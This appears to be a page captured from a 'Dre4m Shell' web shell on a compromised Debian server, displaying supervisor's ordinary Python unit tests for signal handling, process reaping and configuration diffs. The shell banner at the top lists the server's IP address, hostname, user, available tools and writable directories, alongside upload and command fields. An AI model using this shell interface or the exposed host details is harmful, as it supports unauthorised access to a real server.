Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.142.251.204
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/2/root/proc/3/cwd/lib/python3/dist-packages/supervisor/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/2/root/proc/3/cwd/lib/python3/dist-packages/supervisor/tests/test_supervisord.py
import unittest
import time
import signal
import sys
import os
import tempfile
import shutil

from supervisor.states import ProcessStates
from supervisor.states import SupervisorStates

from supervisor.tests.base import DummyOptions
from supervisor.tests.base import DummyPConfig
from supervisor.tests.base import DummyPGroupConfig
from supervisor.tests.base import DummyProcess
from supervisor.tests.base import DummyProcessGroup
from supervisor.tests.base import DummyDispatcher

from supervisor.compat import StringIO

try:
    import pstats
except ImportError: # pragma: no cover
    # Debian-packaged pythons may not have the pstats module
    # unless the "python-profiler" package is installed.
    pstats = None

class EntryPointTests(unittest.TestCase):
    """Exercise ``supervisor.supervisord.main`` with the do-nothing fixture."""

    def _run_main(self, *extra_args):
        """Call ``main()`` in test mode and return what it wrote to stdout.

        ``extra_args`` are appended to the common command line
        (``-c <conf> -l <log> -j <pid> -n``).  The log and pid files live in
        a temporary directory that is removed afterwards, and ``sys.stdout``
        is always restored.
        """
        from supervisor.supervisord import main
        conf = os.path.join(
            os.path.abspath(os.path.dirname(__file__)), 'fixtures',
            'donothing.conf')
        new_stdout = StringIO()
        # Give the in-memory stream a fileno() that reports descriptor 1.
        # NOTE(review): presumably main() asks stdout for its fileno -- confirm.
        new_stdout.fileno = lambda: 1
        # Create the directory *before* entering the try block: if mkdtemp()
        # itself fails there is nothing to clean up, and the finally clause
        # must not hide that error behind a NameError on ``tempdir``.
        tempdir = tempfile.mkdtemp()
        old_stdout = sys.stdout
        try:
            log = os.path.join(tempdir, 'log')
            pid = os.path.join(tempdir, 'pid')
            args = ['-c', conf, '-l', log, '-j', pid, '-n']
            args.extend(extra_args)
            sys.stdout = new_stdout
            main(args=args, test=True)
        finally:
            sys.stdout = old_stdout
            shutil.rmtree(tempdir)
        return new_stdout.getvalue()

    def test_main_noprofile(self):
        output = self._run_main()
        self.assertTrue('supervisord started' in output, output)

    if pstats:
        def test_main_profile(self):
            output = self._run_main('--profile_options=cumulative,calls')
            self.assertTrue('cumulative time, call count' in output, output)

    def test_silent_off(self):
        output = self._run_main()
        self.assertGreater(len(output), 0)

    def test_silent_on(self):
        # -s is expected to leave stdout completely empty
        output = self._run_main('-s')
        self.assertEqual(len(output), 0)

class SupervisordTests(unittest.TestCase):
    def tearDown(self):
        # Reset the event registry so callbacks subscribed by one test are
        # not still registered when the next one runs.
        from supervisor import events
        events.clear()

    def _getTargetClass(self):
        # Imported lazily, inside the method, exactly like the other helpers
        # in this class import what they need.
        from supervisor import supervisord
        return supervisord.Supervisor

    def _makeOne(self, options):
        # Build an instance of the class under test around ``options``.
        target_class = self._getTargetClass()
        return target_class(options)

    def test_main_first(self):
        # main() with options.first set: the dummy options should record
        # that rlimits were set and the process daemonized, with no fd
        # cleanup.
        opts = DummyOptions()
        process_config = DummyPConfig(opts, 'foo', '/bin/foo', '/tmp')
        opts.process_group_configs = [
            DummyPGroupConfig(opts, 'foo', pconfigs=[process_config]),
        ]
        opts.test = True
        opts.first = True

        daemon = self._makeOne(opts)
        daemon.main()

        self.assertEqual(opts.fds_cleaned_up, False)
        self.assertEqual(opts.rlimits_set, True)
        self.assertEqual(opts.parse_criticals, ['setuid_called'])
        self.assertEqual(opts.parse_warnings, [])
        self.assertEqual(opts.parse_infos, ['rlimits_set'])
        self.assertEqual(opts.autochildlogdir_cleared, True)

        groups = daemon.process_groups
        self.assertEqual(len(groups), 1)
        self.assertEqual(groups['foo'].config.options, opts)

        for flag in ('httpservers_opened', 'signals_set', 'daemonized',
                     'pidfile_written', 'cleaned_up'):
            self.assertEqual(getattr(opts, flag), True)

    def test_main_notfirst(self):
        # main() with options.first unset: fds are cleaned up, rlimits are
        # never touched and the process is not daemonized.
        opts = DummyOptions()
        process_config = DummyPConfig(opts, 'foo', '/bin/foo', '/tmp')
        opts.process_group_configs = [
            DummyPGroupConfig(opts, 'foo', pconfigs=[process_config]),
        ]
        opts.test = True
        opts.first = False

        daemon = self._makeOne(opts)
        daemon.main()

        self.assertEqual(opts.fds_cleaned_up, True)
        self.assertFalse(hasattr(opts, 'rlimits_set'))
        self.assertEqual(opts.parse_criticals, ['setuid_called'])
        self.assertEqual(opts.parse_warnings, [])
        self.assertEqual(opts.parse_infos, [])
        self.assertEqual(opts.autochildlogdir_cleared, True)

        groups = daemon.process_groups
        self.assertEqual(len(groups), 1)
        self.assertEqual(groups['foo'].config.options, opts)

        self.assertEqual(opts.httpservers_opened, True)
        self.assertEqual(opts.signals_set, True)
        self.assertEqual(opts.daemonized, False)
        self.assertEqual(opts.pidfile_written, True)
        self.assertEqual(opts.cleaned_up, True)

    def test_reap(self):
        # waitpid reports (pid 1, status 1); the process registered under
        # pid 1 in pidhistory should end up finished with that pair.
        opts = DummyOptions()
        opts.waitpid_return = (1, 1)

        proc = DummyProcess(DummyPConfig(opts, 'process', '/bin/foo', '/tmp'))
        proc.drained = False
        proc.killing = True
        proc.laststop = None
        proc.waitstatus = (None, None)
        opts.pidhistory = {1: proc}

        daemon = self._makeOne(opts)
        daemon.reap(once=True)

        self.assertEqual(proc.finished, (1, 1))

    def test_reap_recursionguard(self):
        # Called with recursionguard=100, reap() is expected to return None.
        daemon = self._makeOne(DummyOptions())
        outcome = daemon.reap(once=True, recursionguard=100)
        self.assertEqual(outcome, None)

    def test_reap_more_than_once(self):
        # Same set-up as test_reap, but without once=True and starting from
        # recursionguard=99.
        opts = DummyOptions()
        opts.waitpid_return = (1, 1)

        proc = DummyProcess(DummyPConfig(opts, 'process', '/bin/foo', '/tmp'))
        proc.drained = False
        proc.killing = True
        proc.laststop = None
        proc.waitstatus = (None, None)
        opts.pidhistory = {1: proc}

        daemon = self._makeOne(opts)
        daemon.reap(recursionguard=99)

        self.assertEqual(proc.finished, (1, 1))

    def test_reap_unknown_pid(self):
        # waitpid reports pid 2, which is absent from pidhistory: the known
        # process must stay untouched and the event must be logged.
        opts = DummyOptions()
        opts.waitpid_return = (2, 0)  # pid, status

        proc = DummyProcess(DummyPConfig(opts, 'process', '/bin/foo', '/tmp'))
        proc.drained = False
        proc.killing = True
        proc.laststop = None
        proc.waitstatus = (None, None)
        opts.pidhistory = {1: proc}

        daemon = self._makeOne(opts)
        daemon.reap(once=True)

        self.assertEqual(proc.finished, None)
        first_log_line = opts.logger.data[0]
        self.assertEqual(first_log_line,
                         'reaped unknown pid 2 (exit status 0)')

    def test_handle_sigterm(self):
        # SIGTERM: mood becomes SHUTDOWN and the request is logged.
        opts = DummyOptions()
        opts._signal = signal.SIGTERM
        daemon = self._makeOne(opts)

        daemon.handle_signal()

        expected_log = 'received SIGTERM indicating exit request'
        self.assertEqual(daemon.options.mood, SupervisorStates.SHUTDOWN)
        self.assertEqual(opts.logger.data[0], expected_log)

    def test_handle_sigint(self):
        # SIGINT: mood becomes SHUTDOWN and the request is logged.
        opts = DummyOptions()
        opts._signal = signal.SIGINT
        daemon = self._makeOne(opts)

        daemon.handle_signal()

        expected_log = 'received SIGINT indicating exit request'
        self.assertEqual(daemon.options.mood, SupervisorStates.SHUTDOWN)
        self.assertEqual(opts.logger.data[0], expected_log)

    def test_handle_sigquit(self):
        # SIGQUIT: mood becomes SHUTDOWN and the request is logged.
        opts = DummyOptions()
        opts._signal = signal.SIGQUIT
        daemon = self._makeOne(opts)

        daemon.handle_signal()

        expected_log = 'received SIGQUIT indicating exit request'
        self.assertEqual(daemon.options.mood, SupervisorStates.SHUTDOWN)
        self.assertEqual(opts.logger.data[0], expected_log)

    def test_handle_sighup_in_running_state(self):
        # SIGHUP while RUNNING: mood flips to RESTARTING.
        opts = DummyOptions()
        opts._signal = signal.SIGHUP
        daemon = self._makeOne(opts)

        # precondition: a fresh supervisor starts out RUNNING
        self.assertEqual(daemon.options.mood, SupervisorStates.RUNNING)

        daemon.handle_signal()

        expected_log = 'received SIGHUP indicating restart request'
        self.assertEqual(daemon.options.mood, SupervisorStates.RESTARTING)
        self.assertEqual(opts.logger.data[0], expected_log)

    def test_handle_sighup_in_shutdown_state(self):
        # SIGHUP while already SHUTDOWN: mood is left alone and the signal
        # is logged as ignored.
        opts = DummyOptions()
        opts._signal = signal.SIGHUP
        daemon = self._makeOne(opts)
        daemon.options.mood = SupervisorStates.SHUTDOWN
        self.assertEqual(daemon.options.mood, SupervisorStates.SHUTDOWN)

        daemon.handle_signal()

        # unchanged
        self.assertEqual(daemon.options.mood, SupervisorStates.SHUTDOWN)
        expected_log = ('ignored SIGHUP indicating restart request '
                        '(shutdown in progress)')
        self.assertEqual(opts.logger.data[0], expected_log)

    def test_handle_sigchld(self):
        # SIGCHLD: mood stays RUNNING and the child exit is logged.
        opts = DummyOptions()
        opts._signal = signal.SIGCHLD
        daemon = self._makeOne(opts)

        daemon.handle_signal()

        self.assertEqual(daemon.options.mood, SupervisorStates.RUNNING)
        # supervisor.options.signame(signal.SIGCHLD) may return "SIGCLD"
        # on linux or other systems where SIGCHLD = SIGCLD.
        acceptable = (
            'received SIGCHLD indicating a child quit',
            'received SIGCLD indicating a child quit',
        )
        self.assertTrue(opts.logger.data[0] in acceptable)

    def test_handle_sigusr2(self):
        # SIGUSR2: mood stays RUNNING, and both the options object and every
        # process group are asked to reopen their logs.
        options = DummyOptions()
        options._signal = signal.SIGUSR2
        supervisord = self._makeOne(options)
        pconfigs = [DummyPConfig(options, 'foo', '/bin/foo', '/tmp')]
        # NOTE(review): this stores a single group config rather than a list
        # of them; kept as-is because nothing asserted below reads it.
        options.process_group_configs = DummyPGroupConfig(
            options, 'foo',
            pconfigs=pconfigs)
        dummypgroup = DummyProcessGroup(options)
        supervisord.process_groups = {None: dummypgroup}

        supervisord.handle_signal()

        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.RUNNING)
        self.assertEqual(options.logs_reopened, True)
        self.assertEqual(options.logger.data[0],
                         'received SIGUSR2 indicating log reopen request')
        self.assertEqual(dummypgroup.logs_reopened, True)

    def test_handle_unknown_signal(self):
        # SIGUSR1 has no special meaning here: mood is unchanged and the
        # signal is logged as "indicating nothing".
        opts = DummyOptions()
        opts._signal = signal.SIGUSR1
        daemon = self._makeOne(opts)

        daemon.handle_signal()

        expected_log = 'received SIGUSR1 indicating nothing'
        self.assertEqual(daemon.options.mood, SupervisorStates.RUNNING)
        self.assertEqual(opts.logger.data[0], expected_log)

    def test_get_state(self):
        # A freshly built supervisor reports RUNNING.
        daemon = self._makeOne(DummyOptions())
        state = daemon.get_state()
        self.assertEqual(state, SupervisorStates.RUNNING)

    def test_diff_to_active_finds_groups_added(self):
        opts = DummyOptions()
        daemon = self._makeOne(opts)

        new_group = DummyPGroupConfig(
            opts, 'group1',
            pconfigs=[DummyPConfig(opts, 'process1', '/bin/foo', '/tmp')])

        # Nothing has been added to the supervisor yet, so a configuration
        # that lists group1 must report it as added.
        daemon.options.process_group_configs = [new_group]
        added, changed, removed = daemon.diff_to_active()

        self.assertEqual(added, [new_group])
        self.assertEqual(changed, [])
        self.assertEqual(removed, [])

    def test_diff_to_active_finds_groups_removed(self):
        opts = DummyOptions()
        daemon = self._makeOne(opts)

        kept_group = DummyPGroupConfig(
            opts, 'group1',
            pconfigs=[DummyPConfig(opts, 'process1', '/bin/process1', '/tmp')])
        dropped_group = DummyPGroupConfig(
            opts, 'group2',
            pconfigs=[DummyPConfig(opts, 'process2', '/bin/process2', '/tmp')])

        # start with both groups configured and active
        daemon.options.process_group_configs = [kept_group, dropped_group]
        for group_config in (kept_group, dropped_group):
            daemon.add_process_group(group_config)

        # drop group2 from the configuration; the diff must report it
        daemon.options.process_group_configs = [kept_group]
        added, changed, removed = daemon.diff_to_active()

        self.assertEqual(added, [])
        self.assertEqual(changed, [])
        self.assertEqual(removed, [dropped_group])

    def test_diff_to_active_changed(self):
        from supervisor.options import ProcessConfig, ProcessGroupConfig

        opts = DummyOptions()
        daemon = self._makeOne(opts)

        def make_pconfig(name, command, **params):
            # Real ProcessConfig with fixed defaults; ``params`` override.
            settings = dict(
                name=name,
                command=command,
                directory=None,
                umask=None,
                priority=999,
                autostart=True,
                autorestart=True,
                startsecs=10,
                startretries=999,
                uid=None,
                stdout_logfile=None,
                stdout_capture_maxbytes=0,
                stdout_events_enabled=False,
                stdout_logfile_backups=0,
                stdout_logfile_maxbytes=0,
                stdout_syslog=False,
                stderr_logfile=None,
                stderr_capture_maxbytes=0,
                stderr_events_enabled=False,
                stderr_logfile_backups=0,
                stderr_logfile_maxbytes=0,
                stderr_syslog=False,
                redirect_stderr=False,
                stopsignal=None,
                stopwaitsecs=10,
                stopasgroup=False,
                killasgroup=False,
                exitcodes=(0,),
                environment=None,
                serverurl=None,
            )
            settings.update(params)
            return ProcessConfig(opts, **settings)

        def make_gconfig(name, pconfigs):
            return ProcessGroupConfig(opts, name, 25, pconfigs)

        # Scenario 1: group1's only process differs in uid between the new
        # configuration and the active one; group2 is the same in both.
        new_group1 = make_gconfig(
            'group1', [make_pconfig('process1', 'process1', uid='new')])
        new_group2 = make_gconfig(
            'group2', [make_pconfig('process2', 'process2')])
        new_configs = [new_group1, new_group2]

        active_group1 = make_gconfig(
            'group1', [make_pconfig('process1', 'process1', uid='old')])
        active_group2 = make_gconfig(
            'group2', [make_pconfig('process2', 'process2')])
        daemon.add_process_group(active_group1)
        daemon.add_process_group(active_group2)

        daemon.options.process_group_configs = new_configs
        added, changed, removed = daemon.diff_to_active()
        self.assertEqual(added, [])
        self.assertEqual(removed, [])
        self.assertEqual(changed, [new_group1])

        # Scenario 2: the new group1 has one more process than the active one.
        opts = DummyOptions()
        daemon = self._makeOne(opts)

        first = make_pconfig('process1', 'process1')
        second = make_pconfig('process2', 'process2')
        new_group1 = make_gconfig('group1', [first, second])
        new_configs = [new_group1]

        daemon.add_process_group(make_gconfig('group1', [first]))

        daemon.options.process_group_configs = new_configs
        added, changed, removed = daemon.diff_to_active()
        self.assertEqual(added, [])
        self.assertEqual(removed, [])
        self.assertEqual(changed, [new_group1])

    def test_diff_to_active_changed_eventlistener(self):
        from supervisor.events import EventTypes
        from supervisor.options import EventListenerConfig, EventListenerPoolConfig

        default_handler = 'supervisor.dispatchers:default_handler'

        def make_pconfig(options, name, command, **params):
            # Real EventListenerConfig with fixed defaults; ``params`` override.
            result = {
                'name': name, 'command': command,
                'directory': None, 'umask': None, 'priority': 999, 'autostart': True,
                'autorestart': True, 'startsecs': 10, 'startretries': 999,
                'uid': None, 'stdout_logfile': None, 'stdout_capture_maxbytes': 0,
                'stdout_events_enabled': False,
                'stdout_logfile_backups': 0, 'stdout_logfile_maxbytes': 0,
                'stdout_syslog': False,
                'stderr_logfile': None, 'stderr_capture_maxbytes': 0,
                'stderr_events_enabled': False,
                'stderr_logfile_backups': 0, 'stderr_logfile_maxbytes': 0,
                'stderr_syslog': False,
                'redirect_stderr': False,
                'stopsignal': None, 'stopwaitsecs': 10,
                'stopasgroup': False,
                'killasgroup': False,
                'exitcodes': (0,), 'environment': None, 'serverurl': None,
            }
            result.update(params)
            return EventListenerConfig(options, **result)

        def make_econfig(*pool_event_names):
            # Map event names to EventTypes attributes (None when unknown).
            return [getattr(EventTypes, pool_event_name, None)
                    for pool_event_name in pool_event_names]

        def make_gconfig(options, name, pconfigs, pool_events,
                         result_handler=default_handler):
            return EventListenerPoolConfig(options, name, 25, pconfigs, 10,
                                           pool_events, result_handler)

        def assert_group1_change_detected(new_overrides, old_overrides):
            # Run one scenario against a fresh supervisor.  group1 is built
            # twice -- once for the new configuration and once for the active
            # one -- from the same defaults plus the given overrides; group2
            # is identical on both sides.  Only group1 may show up as changed.
            options = DummyOptions()
            supervisord = self._makeOne(options)

            def make_group1(command='process1', event='TICK_60',
                            result_handler=default_handler):
                pconfig = make_pconfig(options, 'process1', command)
                return make_gconfig(options, 'group1', [pconfig],
                                    make_econfig(event), result_handler)

            def make_group2():
                pconfig = make_pconfig(options, 'process2', 'process2')
                return make_gconfig(options, 'group2', [pconfig],
                                    make_econfig('TICK_3600'))

            group1 = make_group1(**new_overrides)
            new = [group1, make_group2()]

            supervisord.add_process_group(make_group1(**old_overrides))
            supervisord.add_process_group(make_group2())

            supervisord.options.process_group_configs = new
            added, changed, removed = supervisord.diff_to_active()
            self.assertEqual(added, [])
            self.assertEqual(removed, [])
            self.assertEqual(changed, [group1])

        # Test that changing an eventlistener's command is detected by diff_to_active
        assert_group1_change_detected(
            {'command': 'process1-new'},
            {'command': 'process1-old'})

        # Test that changing an eventlistener's event is detected by diff_to_active
        assert_group1_change_detected(
            {'event': 'TICK_60'},
            {'event': 'TICK_5'})

        # Test that changing an eventlistener's result_handler is detected by diff_to_active
        assert_group1_change_detected(
            {'result_handler': 'new-result-handler'},
            {'result_handler': 'old-result-handler'})

    def test_add_process_group(self):
        opts = DummyOptions()
        process_config = DummyPConfig(opts, 'foo', '/bin/foo', '/tmp')
        group_config = DummyPGroupConfig(opts, 'foo', pconfigs=[process_config])
        opts.process_group_configs = [group_config]
        daemon = self._makeOne(opts)

        # no groups exist before the first add
        self.assertEqual(daemon.process_groups, {})

        # first add registers the group and reports success
        first_result = daemon.add_process_group(group_config)
        self.assertEqual(list(daemon.process_groups.keys()), ['foo'])
        self.assertTrue(first_result)

        # adding the same config again keeps the existing group and
        # reports a falsy result
        existing = daemon.process_groups['foo']
        second_result = daemon.add_process_group(group_config)
        self.assertEqual(existing, daemon.process_groups['foo'])
        self.assertTrue(not second_result)

    def test_add_process_group_emits_event(self):
        from supervisor import events

        seen = []

        def on_group_added(event):
            seen.append(1)

        events.subscribe(events.ProcessGroupAddedEvent, on_group_added)

        opts = DummyOptions()
        process_config = DummyPConfig(opts, 'foo', '/bin/foo', '/tmp')
        group_config = DummyPGroupConfig(opts, 'foo', pconfigs=[process_config])
        opts.process_group_configs = [group_config]
        daemon = self._makeOne(opts)

        daemon.add_process_group(group_config)

        opts.test = True
        daemon.runforever()

        # exactly one ProcessGroupAddedEvent reached the subscriber
        self.assertEqual(seen, [1])

    def test_remove_process_group(self):
        opts = DummyOptions()
        process_config = DummyPConfig(opts, 'foo', '/bin/foo', '/tmp')
        group_config = DummyPGroupConfig(opts, 'foo', pconfigs=[process_config])
        daemon = self._makeOne(opts)

        # removing a name that was never added raises KeyError
        self.assertRaises(KeyError, daemon.remove_process_group, 'asdf')

        # a group without unstopped processes is removed
        daemon.add_process_group(group_config)
        foo_group = daemon.process_groups['foo']
        removed = daemon.remove_process_group('foo')
        self.assertTrue(foo_group.before_remove_called)
        self.assertEqual(daemon.process_groups, {})
        self.assertTrue(removed)

        # a group that still lists an unstopped process stays registered
        daemon.add_process_group(group_config)
        daemon.process_groups['foo'].unstopped_processes = [DummyProcess(None)]
        kept = daemon.remove_process_group('foo')
        self.assertEqual(list(daemon.process_groups.keys()), ['foo'])
        self.assertTrue(not kept)

    def test_remove_process_group_event(self):
        from supervisor import events

        seen = []

        def on_group_removed(event):
            seen.append(1)

        events.subscribe(events.ProcessGroupRemovedEvent, on_group_removed)

        opts = DummyOptions()
        process_config = DummyPConfig(opts, 'foo', '/bin/foo', '/tmp')
        group_config = DummyPGroupConfig(opts, 'foo', pconfigs=[process_config])
        opts.process_group_configs = [group_config]
        daemon = self._makeOne(opts)

        daemon.add_process_group(group_config)
        daemon.process_groups['foo'].stopped_processes = [DummyProcess(None)]
        daemon.remove_process_group('foo')

        opts.test = True
        daemon.runforever()

        # exactly one ProcessGroupRemovedEvent reached the subscriber
        self.assertEqual(seen, [1])

    def test_runforever_emits_generic_startup_event(self):
        from supervisor import events

        seen = []

        def on_state_change(event):
            seen.append(1)

        events.subscribe(events.SupervisorStateChangeEvent, on_state_change)

        opts = DummyOptions()
        daemon = self._makeOne(opts)
        opts.test = True
        daemon.runforever()

        # one state-change event is delivered during the run
        self.assertEqual(seen, [1])

    def test_runforever_emits_generic_specific_event(self):
        from supervisor import events

        seen = []

        def on_running(event):
            seen.append(2)

        events.subscribe(events.SupervisorRunningEvent, on_running)

        opts = DummyOptions()
        opts.test = True
        daemon = self._makeOne(opts)
        daemon.runforever()

        # one SupervisorRunningEvent is delivered during the run
        self.assertEqual(seen, [2])

    def test_runforever_calls_tick(self):
        opts = DummyOptions()
        opts.test = True
        daemon = self._makeOne(opts)

        # ticks starts out empty and holds three entries after one run
        ticks_before = len(daemon.ticks)
        self.assertEqual(ticks_before, 0)
        daemon.runforever()
        ticks_after = len(daemon.ticks)
        self.assertEqual(ticks_after, 3)

    def test_runforever_poll_dispatchers(self):
        # The dummy poller reports fd 6 in its first list and fds 7 and 8 in
        # its second; each matching dispatcher must be serviced, and the one
        # configured to raise OSError must have its error handled.
        opts = DummyOptions()
        opts.poller.result = ([6], [7, 8])
        daemon = self._makeOne(opts)

        process_config = DummyPConfig(opts, 'foo', '/bin/foo',)
        group_config = DummyPGroupConfig(opts, pconfigs=[process_config])
        group = DummyProcessGroup(group_config)

        reader = DummyDispatcher(readable=True)
        writer = DummyDispatcher(writable=True)
        failing = DummyDispatcher(writable=True, error=OSError)
        group.dispatchers = {6: reader, 7: writer, 8: failing}
        daemon.process_groups = {'foo': group}

        opts.test = True
        daemon.runforever()

        self.assertEqual(group.transitioned, True)
        self.assertEqual(reader.read_event_handled, True)
        self.assertEqual(writer.write_event_handled, True)
        self.assertEqual(failing.error_handled, True)

    def test_runforever_select_dispatcher_exitnow_via_read(self):
        # A dispatcher raising ExitNow for an fd in the poller's first list
        # must not be swallowed: the exception propagates out of runforever().
        from supervisor.medusa import asyncore_25 as asyncore

        opts = DummyOptions()
        opts.poller.result = ([6], [])
        daemon = self._makeOne(opts)

        process_config = DummyPConfig(opts, 'foo', '/bin/foo',)
        group_config = DummyPGroupConfig(opts, pconfigs=[process_config])
        group = DummyProcessGroup(group_config)
        group.dispatchers = {
            6: DummyDispatcher(readable=True, error=asyncore.ExitNow),
        }
        daemon.process_groups = {'foo': group}

        opts.test = True
        self.assertRaises(asyncore.ExitNow, daemon.runforever)

    def test_runforever_select_dispatcher_exitnow_via_write(self):
        # Same as the "via_read" variant, but fd 6 is reported in the
        # poller's second list.
        from supervisor.medusa import asyncore_25 as asyncore

        opts = DummyOptions()
        opts.poller.result = ([], [6])
        daemon = self._makeOne(opts)

        process_config = DummyPConfig(opts, 'foo', '/bin/foo',)
        group_config = DummyPGroupConfig(opts, pconfigs=[process_config])
        group = DummyProcessGroup(group_config)
        # NOTE(review): the dispatcher is created with readable=True even
        # though this is the write-side test -- confirm whether
        # writable=True was intended.
        group.dispatchers = {
            6: DummyDispatcher(readable=True, error=asyncore.ExitNow),
        }
        daemon.process_groups = {'foo': group}

        opts.test = True
        self.assertRaises(asyncore.ExitNow, daemon.runforever)

    def test_runforever_select_dispatcher_handle_error_via_read(self):
        # A dispatcher raising something other than ExitNow for an fd in the
        # poller's first list has its error handled; runforever() returns.
        opts = DummyOptions()
        opts.poller.result = ([6], [])
        daemon = self._makeOne(opts)

        process_config = DummyPConfig(opts, 'foo', '/bin/foo',)
        group_config = DummyPGroupConfig(opts, pconfigs=[process_config])
        group = DummyProcessGroup(group_config)
        broken = DummyDispatcher(readable=True, error=NotImplementedError)
        group.dispatchers = {6: broken}
        daemon.process_groups = {'foo': group}

        opts.test = True
        daemon.runforever()

        self.assertEqual(broken.error_handled, True)

    def test_runforever_select_dispatcher_handle_error_via_write(self):
        # Same as the "via_read" variant, but fd 6 is reported in the
        # poller's second list.
        opts = DummyOptions()
        opts.poller.result = ([], [6])
        daemon = self._makeOne(opts)

        process_config = DummyPConfig(opts, 'foo', '/bin/foo',)
        group_config = DummyPGroupConfig(opts, pconfigs=[process_config])
        group = DummyProcessGroup(group_config)
        # NOTE(review): readable=True on the write-side test -- confirm
        # whether writable=True was intended.
        broken = DummyDispatcher(readable=True, error=NotImplementedError)
        group.dispatchers = {6: broken}
        daemon.process_groups = {'foo': group}

        opts.test = True
        daemon.runforever()

        self.assertEqual(broken.error_handled, True)

    def test_runforever_stopping_emits_events(self):
        from supervisor import events
        from supervisor.medusa import asyncore_25 as asyncore

        opts = DummyOptions()
        daemon = self._makeOne(opts)
        group = DummyProcessGroup(DummyPGroupConfig(opts))
        daemon.process_groups = {'foo': group}
        daemon.options.mood = SupervisorStates.SHUTDOWN

        received = []

        def record(event):
            received.append(event)

        events.subscribe(events.SupervisorStateChangeEvent, record)

        opts.test = True
        self.assertRaises(asyncore.ExitNow, daemon.runforever)
        self.assertTrue(group.all_stopped)

        # first a running event, then a stopping event; both are also
        # instances of the generic state-change event
        first, second = received[0], received[1]
        self.assertTrue(isinstance(first, events.SupervisorRunningEvent))
        self.assertTrue(isinstance(first, events.SupervisorStateChangeEvent))
        self.assertTrue(isinstance(second, events.SupervisorStoppingEvent))
        self.assertTrue(isinstance(second, events.SupervisorStateChangeEvent))

    def test_exit(self):
        # In RESTARTING mood with a group that has nothing left to stop,
        # runforever() raises ExitNow and the group is marked all_stopped.
        from supervisor.medusa import asyncore_25 as asyncore

        options = DummyOptions()
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        supervisord.process_groups = {'foo': pgroup}
        supervisord.options.mood = SupervisorStates.RESTARTING
        supervisord.options.test = True

        self.assertRaises(asyncore.ExitNow, supervisord.runforever)
        self.assertEqual(pgroup.all_stopped, True)

    def test_exit_delayed(self):
        # In RESTARTING mood with a group that still lists an unstopped
        # process, runforever() returns normally and lastshutdownreport is
        # no longer 0.
        options = DummyOptions()
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        process = DummyProcess(pconfig)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        pgroup.unstopped_processes = [process]
        supervisord.process_groups = {'foo': pgroup}
        supervisord.options.mood = SupervisorStates.RESTARTING
        supervisord.options.test = True

        supervisord.runforever()

        self.assertNotEqual(supervisord.lastshutdownreport, 0)

    def test_getSupervisorStateDescription(self):
        # The RUNNING state code maps to the string 'RUNNING'.
        from supervisor import states
        description = states.getSupervisorStateDescription(
            SupervisorStates.RUNNING)
        self.assertEqual(description, 'RUNNING')

    def test_tick(self):
        from supervisor import events

        received = []

        def record(event):
            received.append(event)

        events.subscribe(events.TickEvent, record)
        daemon = self._makeOne(DummyOptions())

        def tick_and_check(now, expected_ticks, expected_event_count):
            # Advance the clock to ``now`` and verify the stored value for
            # the 5, 60 and 3600 second periods (in that order) plus the
            # running total of tick events received so far.
            daemon.tick(now=now)
            for period, expected in zip((5, 60, 3600), expected_ticks):
                self.assertEqual(daemon.ticks[period], expected)
            self.assertEqual(len(received), expected_event_count)

        # the first call only initialises the counters; no event yet
        tick_and_check(0, (0, 0, 0), 0)

        tick_and_check(6, (5, 0, 0), 1)
        self.assertEqual(received[-1].__class__, events.Tick5Event)

        tick_and_check(61, (60, 60, 0), 3)
        self.assertEqual(received[-1].__class__, events.Tick60Event)

        tick_and_check(3601, (3600, 3600, 3600), 6)
        self.assertEqual(received[-1].__class__, events.Tick3600Event)

def test_suite():
    """Return a suite holding every TestCase defined in this module.

    Uses the default test loader instead of ``unittest.findTestCases``,
    which was deprecated in Python 3.11 and removed in 3.13.
    """
    return unittest.defaultTestLoader.loadTestsFromModule(
        sys.modules[__name__])

# Allow running this file directly as a script: unittest looks up the name
# 'test_suite' in this module and runs what it returns.
if __name__ == '__main__':
    unittest.main(defaultTest='test_suite')


Anon7 - 2022
AnonSec Team